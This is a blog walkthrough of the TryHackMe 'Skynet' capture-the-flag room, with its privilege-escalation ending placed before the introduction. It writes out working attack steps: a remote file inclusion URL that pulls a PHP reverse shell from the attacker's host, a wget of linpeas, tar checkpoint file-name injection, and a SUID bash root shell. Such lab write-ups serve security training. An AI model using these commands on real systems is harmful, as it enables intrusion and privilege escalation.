<p>First, we’ll create the <code>magic.sh</code> file that will add a SUID bit to <code>/bin/bash</code>. The next time we spawn a shell after setting up the hack and waiting at least 1 minute, we can use persistence mode (<code>/bin/bash -p</code>) to spawn a root shell.</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">printf '#!/bin/bash\nchmod +s /bin/bash' > magic.sh</pre>
<p>Next, let’s use echo to create two more files with unusual names that are necessary for the tarball creation process to trigger our <code>magic.sh</code> program and add the SUID bit to <code>/bin/bash</code>.</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">echo "/var/www/html" > "--checkpoint-action=exec=sh magic.sh"
echo "/var/www/html" > --checkpoint=1</pre>
</p>
<div class="wp-block-image">
<figure class="aligncenter size-full"><img decoding="async" loading="lazy" width="769" height="450" src="https://blog.finxter.com/wp-content/uploads/2023/01/image-360.png" alt="" class="wp-image-1097607" srcset="https://blog.finxter.com/wp-content/uploads/2023/01/image-360.png 769w, https://blog.finxter.com/wp-content/uplo...00x176.png 300w" sizes="(max-width: 769px) 100vw, 769px" /></figure>
</div>
<h2>USER FLAG</h2>
<p>Let’s grab the root flag from <code>/home/milesdyson</code></p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">$ cat user.txt
7c—-omitted—----07</pre>
</p>
<div class="wp-block-image">
<figure class="aligncenter size-full"><img decoding="async" loading="lazy" width="458" height="450" src="https://blog.finxter.com/wp-content/uploads/2023/01/image-361.png" alt="" class="wp-image-1097608" srcset="https://blog.finxter.com/wp-content/uploads/2023/01/image-361.png 458w, https://blog.finxter.com/wp-content/uplo...00x295.png 300w" sizes="(max-width: 458px) 100vw, 458px" /></figure>
</div>
<h2>ROOT FLAG</h2>
<pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">cat /root/root.txt
3f—-omitted—----49</pre>
</p>
<div class="wp-block-image">
<figure class="aligncenter size-full"><img decoding="async" loading="lazy" width="771" height="209" src="https://blog.finxter.com/wp-content/uploads/2023/01/image-362.png" alt="" class="wp-image-1097609" srcset="https://blog.finxter.com/wp-content/uploads/2023/01/image-362.png 771w, https://blog.finxter.com/wp-content/uplo...300x81.png 300w, https://blog.finxter.com/wp-content/uplo...68x208.png 768w" sizes="(max-width: 771px) 100vw, 771px" /></figure>
</div>
<h2>TAKE-AWAYS</h2>
<p><strong>Takeaway #1 – </strong>The simpler solution is usually the better solution. <code>- I</code> wasted a lot of time trying to get Metasploit to catch the reverse shell and start a meterpreter session. </p>
<p>In the end, I learned I had overlooked setting the payload on <code>msfconsole</code> listener (exploit(multi/handler)) to match that of my reverse shell payload. </p>
<p>It’s not listed when you search “options”, but it is still necessary to set it to be able to properly catch the shell and start a meterpreter session. I used a basic shell session to root the box, and all of that precious time spent on metasploit didn’t help us get root access.</p>
<p><strong>Takeaway #2 – </strong>Remote file inclusion vulnerabilities allow threat actors to carry out arbitrary code execution. In practice, this means that your machine can be quickly compromised, all the way down to the root user.</p>
</div>
https://www.sickgaming.net/blog/2023/01/...inclusion/
<div>
<div class="kk-star-ratings kksr-auto kksr-align-left kksr-valign-top" data-payload='{"align":"left","id":"1097569","slug":"default","valign":"top","ignore":"","reference":"auto","class":"","count":"1","legendonly":"","readonly":"","score":"5","starsonly":"","best":"5","gap":"5","greet":"Rate this post","legend":"5\/5 - (1 vote)","size":"24","width":"142.5","_legend":"{score}\/{best} - ({count} {votes})","font_factor":"1.25"}'>
<div class="kksr-stars">
<div class="kksr-stars-inactive">
<div class="kksr-star" data-star="1" style="padding-right: 5px">
<div class="kksr-icon" style="width: 24px; height: 24px;"></div>
</p></div>
<div class="kksr-star" data-star="2" style="padding-right: 5px">
<div class="kksr-icon" style="width: 24px; height: 24px;"></div>
</p></div>
<div class="kksr-star" data-star="3" style="padding-right: 5px">
<div class="kksr-icon" style="width: 24px; height: 24px;"></div>
</p></div>
<div class="kksr-star" data-star="4" style="padding-right: 5px">
<div class="kksr-icon" style="width: 24px; height: 24px;"></div>
</p></div>
<div class="kksr-star" data-star="5" style="padding-right: 5px">
<div class="kksr-icon" style="width: 24px; height: 24px;"></div>
</p></div>
</p></div>
<div class="kksr-stars-active" style="width: 142.5px;">
<div class="kksr-star" style="padding-right: 5px">
<div class="kksr-icon" style="width: 24px; height: 24px;"></div>
</p></div>
<div class="kksr-star" style="padding-right: 5px">
<div class="kksr-icon" style="width: 24px; height: 24px;"></div>
</p></div>
<div class="kksr-star" style="padding-right: 5px">
<div class="kksr-icon" style="width: 24px; height: 24px;"></div>
</p></div>
<div class="kksr-star" style="padding-right: 5px">
<div class="kksr-icon" style="width: 24px; height: 24px;"></div>
</p></div>
<div class="kksr-star" style="padding-right: 5px">
<div class="kksr-icon" style="width: 24px; height: 24px;"></div>
</p></div>
</p></div>
</div>
<div class="kksr-legend" style="font-size: 19.2px;"> 5/5 – (1 vote) </div>
</p></div>
<p class="has-global-color-8-background-color has-background"><img src="https://s.w.org/images/core/emoji/14.0.0/72x72/1f510.png" alt="?" class="wp-smiley" style="height: 1em; max-height: 1em;" /> <strong>How I used a remote file inclusion vulnerability to hack and root the Terminator’s computer</strong></p>
<figure class="wp-block-embed-youtube wp-block-embed is-type-video is-provider-youtube"><a href="https://blog.finxter.com/tryhackme-skynet-walkthrough-using-remote-file-inclusion/"><img src="https://blog.finxter.com/wp-content/plugins/wp-youtube-lyte/lyteCache.php?origThumbUrl=https%3A%2F%2Fi.ytimg.com%2Fvi%2FbKqwOXIMD4M%2Fhqdefault.jpg" alt="YouTube Video"></a><figcaption></figcaption></figure>
<h2>CHALLENGE OVERVIEW</h2>
<ul>
<li><strong>Link</strong>: <a href="https://tryhackme.com/room/skynet" target="_blank" rel="noreferrer noopener">https://tryhackme.com/room/skynet</a></li>
<li><strong>Difficulty</strong>: Easy</li>
<li><strong>Target</strong>: <code>user</code>/<code>root</code> flags</li>
<li><strong>Highlight</strong>: exploiting a remote file inclusion vulnerability to spawn a reverse shell</li>
<li><strong>Tools used</strong>: <code>smbclient</code>, <code>smbmap</code>, <code>gobuster</code>, <code>metasploit</code></li>
<li><strong>Tags</strong>: <em>gobuster, smb, rfi, squirrelmail</em></li>
</ul>
<h2>BACKGROUND</h2>
<p>In this walkthrough, we will root a terminator-themed capture-the-flag (CTF) challenge box.</p>
<div class="wp-block-image">
<figure class="aligncenter size-full"><img loading="lazy" decoding="async" width="814" height="307" src="https://blog.finxter.com/wp-content/uploads/2023/01/image-356.png" alt="" class="wp-image-1097574" srcset="https://blog.finxter.com/wp-content/uploads/2023/01/image-356.png 814w, https://blog.finxter.com/wp-content/uplo...00x113.png 300w, https://blog.finxter.com/wp-content/uplo...68x290.png 768w" sizes="(max-width: 814px) 100vw, 814px" /></figure>
</div>
<h2><strong>IPs</strong></h2>
<pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">export targetIP=10.10.144.117
export myIP=10.6.2.23</pre>
<h2>ENUMERATION</h2>
<pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">sudo nmap -p- -T5 -A -oN nmapscan.txt 10.10.144.117 -Pn</pre>
<h2>NMAP SCAN RESULTS</h2>
<div class="wp-block-image">
<figure class="aligncenter size-full"><img decoding="async" loading="lazy" width="601" height="589" src="https://blog.finxter.com/wp-content/uploads/2023/01/image-364.png" alt="" class="wp-image-1097639" srcset="https://blog.finxter.com/wp-content/uploads/2023/01/image-364.png 601w, https://blog.finxter.com/wp-content/uplo...00x294.png 300w" sizes="(max-width: 601px) 100vw, 601px" /></figure>
</div>
<pre class="wp-block-preformatted"><code>Starting Nmap 7.92 ( https://nmap.org ) at 2023-01-23 18:33 EST
Stats: 0:00:02 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 0.10% done
Stats: 0:00:04 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 2.13% done; ETC: 18:35 (0:02:18 remaining)
Stats: 0:00:05 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 2.35% done; ETC: 18:36 (0:02:46 remaining)
Stats: 0:00:06 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 2.56% done; ETC: 18:36 (0:03:10 remaining)
Nmap scan report for 10.10.144.117
Host is up (0.084s latency).
Not shown: 65529 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 99:23:31:bb:b1:e9:43:b7:56:94:4c:b9:e8:21:46:c5 (RSA)
| 256 57:c0:75:02:71:2d:19:31:83:db:e4:fe:67:96:68:cf (ECDSA)
|_ 256 46:fa:4e:fc:10:a5:4f:57:57:d0:6d:54:f6:c3:4d:fe (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Skynet
110/tcp open pop3 Dovecot pop3d
|_pop3-capabilities: RESP-CODES CAPA PIPELINING UIDL TOP SASL AUTH-RESP-CODE
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
143/tcp open imap Dovecot imapd
|_imap-capabilities: IMAP4rev1 ID LOGIN-REFERRALS have LOGINDISABLEDA0001 capabilities more post-login ENABLE listed LITERAL+ Pre-login OK IDLE SASL-IR
445/tcp open netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
Aggressive OS guesses: Linux 3.10 - 3.13 (95%), Linux 5.4 (95%), ASUS RT-N56U WAP (Linux 3.4) (95%), Linux 3.16 (95%), Linux 3.1 (93%), Linux 3.2 (93%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (92%), Sony Android TV (Android 5.0) (92%), Android 5.0 - 6.0.1 (Linux 3.4) (92%), Android 5.1 (92%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 4 hops
Service Info: Host: SKYNET; OS: Linux; CPE: cpe:/o:linux:linux_kernel Host script results:
|_clock-skew: mean: 6h59m59s, deviation: 3h27m51s, median: 4h59m59s
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled but not required
|_nbstat: NetBIOS name: SKYNET, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb2-time:
| date: 2023-01-24T04:40:37
|_ start_date: N/A
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
| Computer name: skynet
| NetBIOS computer name: SKYNET\x00
| Domain name: \x00
| FQDN: skynet
|_ System time: 2023-01-23T22:40:36-06:00 TRACEROUTE (using port 554/tcp)
HOP RTT ADDRESS
1 13.67 ms 10.6.0.1
2 ... 3
4 81.31 ms 10.10.144.117 OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 443.46 seconds
</code></pre>
</p>
<h2>DIRB SCAN RESULTS</h2>
<div class="wp-block-image">
<figure class="aligncenter size-full"><img decoding="async" loading="lazy" width="533" height="415" src="https://blog.finxter.com/wp-content/uploads/2023/01/image-357.png" alt="" class="wp-image-1097578" srcset="https://blog.finxter.com/wp-content/uploads/2023/01/image-357.png 533w, https://blog.finxter.com/wp-content/uplo...00x234.png 300w" sizes="(max-width: 533px) 100vw, 533px" /></figure>
</div>
<p>The <code>SquirrelMail</code> directory looks interesting. We’ll check that out in a minute.</p>
<h2>ENUMERATE THE SMB SHARE WITH NMAP SCAN</h2>
<div class="wp-block-image">
<figure class="aligncenter size-full"><img decoding="async" loading="lazy" width="594" height="587" src="https://blog.finxter.com/wp-content/uploads/2023/01/image-365.png" alt="" class="wp-image-1097640" srcset="https://blog.finxter.com/wp-content/uploads/2023/01/image-365.png 594w, https://blog.finxter.com/wp-content/uplo...00x296.png 300w" sizes="(max-width: 594px) 100vw, 594px" /></figure>
</div>
<pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">nmap --script smb-enum-shares -p 139 10.10.144.117</pre>
<p>Output:</p>
<pre class="wp-block-preformatted"><code>Starting Nmap 7.92 ( https://nmap.org ) at 2023-01-23 18:56 EST
Nmap scan report for 10.10.144.117
Host is up (0.086s latency). PORT STATE SERVICE
139/tcp open netbios-ssn Host script results:
| smb-enum-shares:
| account_used: guest
| \\10.10.144.117\IPC$:
| Type: STYPE_IPC_HIDDEN
| Comment: IPC Service (skynet server (Samba, Ubuntu))
| Users: 1
| Max Users: <unlimited>
| Path: C:\tmp
| Anonymous access: READ/WRITE
| Current user access: READ/WRITE
| \\10.10.144.117\anonymous:
| Type: STYPE_DISKTREE
| Comment: Skynet Anonymous Share
| Users: 0
| Max Users: <unlimited>
| Path: C:\srv\samba
| Anonymous access: READ/WRITE
| Current user access: READ/WRITE
| \\10.10.144.117\milesdyson:
| Type: STYPE_DISKTREE
| Comment: Miles Dyson Personal Share
| Users: 0
| Max Users: <unlimited>
| Path: C:\home\milesdyson\share
| Anonymous access: <none>
| Current user access: <none>
| \\10.10.144.117\print$:
| Type: STYPE_DISKTREE
| Comment: Printer Drivers
| Users: 0
| Max Users: <unlimited>
| Path: C:\var\lib\samba\printers
| Anonymous access: <none>
|_ Current user access: <none>
smbmap -H 10.10.144.117
[+] Guest session IP: 10.10.144.117:445 Name: 10.10.144.117 Disk Permissions Comment ---- ----------- ------- print$ NO ACCESS Printer Drivers anonymous READ ONLY Skynet Anonymous Share milesdyson NO ACCESS Miles Dyson Personal Share IPC$ NO ACCESS IPC Service (skynet server (Samba, Ubuntu))
</code></pre>
</p>
<h2>LOGIN TO SAMBA SHARES AS ANONYMOUS</h2>
<pre class="wp-block-preformatted"><code>smbclient //10.10.144.117/anonymous
Password for [WORKGROUP\kalisurfer]:
Try "help" to get a list of possible commands.
smb: \> ls . D 0 Thu Nov 26 11:04:00 2020 .. D 0 Tue Sep 17 03:20:17 2019 attention.txt N 163 Tue Sep 17 23:04:59 2019 logs D 0 Wed Sep 18 00:42:16 2019 grab the log1.txt (a password list)
milesdyson (username)
</code></pre>
<h2>WALK THE WEBSITE</h2>
<p>We discovered a login portal for <code>squirrelmail</code> from the <code>dirb</code> scan. Let’s check it out now in our browser.</p>
<pre class="wp-block-preformatted"><code>http://10.10.144.117/squirrelmail</code></pre>
<p>Loading the site reveals a version number. A quick search points to a local file inclusion vulnerability.</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">SquirrelMail version 1.4.23 [SVN]
Squirrelmail 1.4.x - 'Redirect.php' Local File Inclusion
</pre>
<h2>ENUMERATING THE SMB SHARE</h2>
<p>The first password from the <code>log1.txt</code> file from the <code>smb</code> share on the list works! We are in milesdyson’s email account now and see two interesting emails.</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">serenakogan@skynet 01100010 01100001 01101100 01101100 01110011 00100000 01101000 01100001 01110110
01100101 00100000 01111010 01100101 01110010 01101111 00100000 01110100 01101111
00100000 01101101 01100101 00100000 01110100 01101111 00100000 01101101 01100101
00100000 01110100 01101111 00100000 01101101 01100101 00100000 01110100 01101111
00100000 01101101 01100101 00100000 01110100 01101111 00100000 01101101 01100101
00100000 01110100 01101111 00100000 01101101 01100101 00100000 01110100 01101111
00100000 01101101 01100101 00100000 01110100 01101111 00100000 01101101 01100101
00100000 01110100 01101111 skynet@skynet
new smb password: )s{A&2Z=F^n_E.B`
</pre>
<h2>LOGIN TO SMB SHARE AS milesdyson</h2>
<pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="1" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">smbclient //$targetIP/milesdyson -U milesdyson
Password for [WORKGROUP\milesdyson]:
Try "help" to get a list of possible commands.
smb: \> ls . D 0 Tue Sep 17 05:05:47 2019 .. D 0 Tue Sep 17 23:51:03 2019 Improving Deep Neural Networks.pdf N 5743095 Tue Sep 17 05:05:14 2019 Natural Language Processing-Building Sequence Models.pdf N 12927230 Tue Sep 17 05:05:14 2019 Convolutional Neural Networks-CNN.pdf N 19655446 Tue Sep 17 05:05:14 2019 notes D 0 Tue Sep 17 05:18:40 2019 Neural Networks and Deep Learning.pdf N 4304586 Tue Sep 17 05:05:14 2019 Structuring your Machine Learning Project.pdf N 3531427 Tue Sep 17 05:05:14 2019 9204224 blocks of size 1024. 5831424 blocks available
</pre>
<p>Let’s grab the <code>important.txt</code> file:</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">get important.txt</pre>
<p>Reading through the contents, we are pointed toward a hidden beta cms directory</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">/45kra24zxs28v3yd</pre>
<h2>GOBUSTER FOR DIRECTORY SNIFFING</h2>
<p>We’ll further enumerate the hidden beta cms directory now with gobuster.</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">gobuster dir -uhttp://10.10.221.72/45kra24zxs28v3yd/ -w /usr/share/wordlists/dirb/common.txt
</pre>
<pre class="wp-block-preformatted"><code>===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.169.173/45kra24zxs28v3yd/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s
===============================================================
2023/01/24 09:52:22 Starting gobuster in directory enumeration mode
===============================================================
/.hta (Status: 403) [Size: 278]
/.htaccess (Status: 403) [Size: 278]
/.htpasswd (Status: 403) [Size: 278]
/administrator (Status: 301) [Size: 339] [--> http://10.10.169.173/45kra24zxs28v3yd/administrator/]
Progress: 337 / 4615 (7.30%) Progress: 397 / 4615 (8.60%) Progress: 456 / 4615 (9.88%) Progress: 507 / 4615 (10.99%) Progress: 558 / 4615 (12.09%) Progress: 618 / 4615 (13.39%) Progress: 674 / 4615 (14.60%) Progress: 728 / 4615 (15.77%) Progress: 788 / 4615 (17.07%) Progress: 845 / 4615 (18.31%) Progress: 898 / 4615 (19.46%) Progress: 956 / 4615 (20.72%) Progress: 1015 / 4615 (21.99%) Progress: 1072 / 4615 (23.23%) Progress: 1125 / 4615 (24.38%) Progress: 1185 / 4615 (25.68%) Progress: 1245 / 4615 (26.98%) Progress: 1299 / 4615 (28.15%) Progress: 1359 / 4615 (29.45%) Progress: 1419 / 4615 (30.75%) Progress: 1472 / 4615 (31.90%) Progress: 1532 / 4615 (33.20%) Progress: 1590 / 4615 (34.45%) Progress: 1640 / 4615 (35.54%) Progress: 1700 / 4615 (36.84%) Progress: 1750 / 4615 (37.92%) Progress: 1804 / 4615 (39.09%) Progress: 1864 / 4615 (40.39%) Progress: 1904 / 4615 (41.26%) Progress: 1964 / 4615 (42.56%) Progress: 2020 / 4615 (43.77%) /index.html (Status: 200) [Size: 418] Progress: 2063 / 4615 (44.70%) Progress: 2123 / 4615 (46.00%) Progress: 2173 / 4615 (47.09%) Progress: 2216 / 4615 (48.02%) Progress: 2273 / 4615 (49.25%) Progress: 2333 / 4615 (50.55%) Progress: 2383 / 4615 (51.64%) Progress: 2443 / 4615 (52.94%) Progress: 2503 / 4615 (54.24%) Progress: 2563 / 4615 (55.54%) Progress: 2618 / 4615 (56.73%) Progress: 2673 / 4615 (57.92%) Progress: 2733 / 4615 (59.22%) Progress: 2782 / 4615 (60.28%) Progress: 2842 / 4615 (61.58%) Progress: 2903 / 4615 (62.90%) Progress: 2962 / 4615 (64.18%) Progress: 3020 / 4615 (65.44%) Progress: 3075 / 4615 (66.63%) Progress: 3135 / 4615 (67.93%) Progress: 3194 / 4615 (69.21%) Progress: 3254 / 4615 (70.51%) Progress: 3305 / 4615 (71.61%) Progress: 3364 / 4615 (72.89%) Progress: 3424 / 4615 (74.19%) Progress: 3484 / 4615 (75.49%) Progress: 3544 / 4615 (76.79%) Progress: 3597 / 4615 (77.94%) Progress: 3655 / 4615 (79.20%) Progress: 3707 / 4615 (80.33%) Progress: 3767 / 4615 (81.63%) Progress: 3827 / 4615 (82.93%) Progress: 3887 / 4615 (84.23%) Progress: 3947 / 4615 (85.53%) Progress: 4001 / 4615 (86.70%) Progress: 4058 / 4615 (87.93%) Progress: 4115 / 4615 (89.17%) Progress: 4174 / 4615 (90.44%) Progress: 4234 / 4615 (91.74%) Progress: 4285 / 4615 (92.85%) Progress: 4338 / 4615 (94.00%) Progress: 4398 / 4615 (95.30%) Progress: 4458 / 4615 (96.60%) Progress: 4513 / 4615 (97.79%) Progress: 4570 / 4615 (99.02%) ===============================================================
2023/01/24 09:53:04 Finished
===============================================================</code>
</pre>
<h2>ADMINISTRATOR PORTAL DISCOVERED!</h2>
<div class="wp-block-image">
<figure class="aligncenter size-full"><img decoding="async" loading="lazy" width="596" height="591" src="https://blog.finxter.com/wp-content/uploads/2023/01/image-366.png" alt="" class="wp-image-1097641" srcset="https://blog.finxter.com/wp-content/uploads/2023/01/image-366.png 596w, https://blog.finxter.com/wp-content/uplo...00x297.png 300w, https://blog.finxter.com/wp-content/uplo...50x150.png 150w" sizes="(max-width: 596px) 100vw, 596px" /></figure>
</div>
<pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">http://10.10.169.173/45kra24zxs28v3yd/administrator/</pre>
<h2>IDENTIFY A KNOWN VULNERABILITY</h2>
<p>Looking up the service name shows us that there is a remote file inclusion vulnerability.</p>
<div class="wp-block-image">
<figure class="aligncenter size-full"><img decoding="async" loading="lazy" width="769" height="456" src="https://blog.finxter.com/wp-content/uploads/2023/01/image-358.png" alt="" class="wp-image-1097594" srcset="https://blog.finxter.com/wp-content/uploads/2023/01/image-358.png 769w, https://blog.finxter.com/wp-content/uplo...00x178.png 300w" sizes="(max-width: 769px) 100vw, 769px" /></figure>
</div>
<h2>SPAWN A REVERSE SHELL WITH PHP PENTEST MONKEY AND REMOTE FILE INCLUSION</h2>
<p>After preparing a basic php revshell, serving it with a simple HTTP server, we now go to our browser and load the address:</p>
<p><a href="http://10.10.221.72/45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=http://$myIP:8000/payload.php" target="_blank" rel="noreferrer noopener">http://10.10.221.72/45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=http://$myIP:8000/payload.php</a></p>
<h2>STABILIZE THE SHELL</h2>
<pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">python -c 'import pty;pty.spawn("/bin/bash")';</pre>
<h2>ENUMERATE WITH LINPEAS</h2>
<p>After downloading <code>linpeas.sh</code> and serving it with the simple HTTP server, we can copy it over to our target machine’s <code>/tmp</code> folder with <code>wget http://$myIP:port/linpeas.sh</code>.</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">$ ./linpeas.sh</pre>
<pre class="wp-block-preformatted"><code> ▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄ ▄▄▄▄ ▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄ ▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄ ▄▄▄▄▄▄ ▄ ▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄ ▄▄▄▄ ▄▄ ▄▄▄ ▄▄▄▄▄ ▄▄▄ ▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄ ▄ ▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄ ▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄ ▄▄▄▄▄ ▄▄▄▄▄ ▄▄▄▄▄▄ ▄▄▄▄ ▄▄▄▄ ▄▄▄▄▄ ▄▄▄▄▄ ▄ ▄▄ ▄▄▄▄▄ ▄▄▄▄▄ ▄▄▄▄▄▄▄ ▄▄▄▄▄ ▄▄▄▄▄ ▄▄▄▄▄▄ ▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄ ▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▀▀▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▀▀▀▀▀▀ ▀▀▀▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▀▀ ▀▀▀▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▀▀▀ /---------------------------------------------------------------------------------\ | Do you like PEASS? | |---------------------------------------------------------------------------------| | Get the latest version : https://github.com/sponsors/carlospolop | | Follow on Twitter : @carlospolopm | | Respect on HTB : SirBroccoli | |---------------------------------------------------------------------------------| | Thank you! | \---------------------------------------------------------------------------------/ linpeas-ng by carlospolop
</code></pre>
<p class="has-global-color-8-background-color has-background"><img src="https://s.w.org/images/core/emoji/14.0.0/72x72/1f510.png" alt="?" class="wp-smiley" style="height: 1em; max-height: 1em;" /> <strong>ADVISORY</strong>: This script should be used for authorized penetration testing and/or educational purposes only. Any misuse of this software will not be the responsibility of the author or of any other collaborator. Use it on your own computers and/or with the computer owner’s permission.</p>
<p>Linux Privesc Checklist: <a href="https://book.hacktricks.xyz/linux-hardening/linux-privilege-escalation-checklist" target="_blank" rel="noreferrer noopener">https://book.hacktricks.xyz/linux-hardening/linux-privilege-escalation-checklist</a></p>
<pre class="wp-block-preformatted"><code>LEGEND: RED/YELLOW: 95% a PE vector RED: You should take a look to it LightCyan: Users with console Blue: Users without console & mounted devs Green: Common things (users, groups, SUID/SGID, mounts, .sh scripts, cronjobs) LightMagenta: Your username Starting linpeas. Caching Writable Folders... ╔═══════════════════╗
═══════════════════════════════╣ Basic information ╠═══════════════════════════════ ╚═══════════════════╝
OS: Linux version 4.8.0-58-generic (buildd@lgw01-21) (gcc version 5.4.0 20160609 (Ubuntu 5.4.0-6ubuntu1~16.04.4) ) #63~16.04.1-Ubuntu SMP Mon Jun 26 18:08:51 UTC 2017
User & Groups: uid=33(www-data) gid=33(www-data) groups=33(www-data)
Hostname: skynet
Writable folder: /dev/shm
[+] /bin/ping is available for network discovery (linpeas can discover hosts, learn more with -h)
[+] /bin/bash is available for network discovery, port scanning and port forwarding (linpeas can discover hosts, scan ports, and forward ports. Learn more with -h)
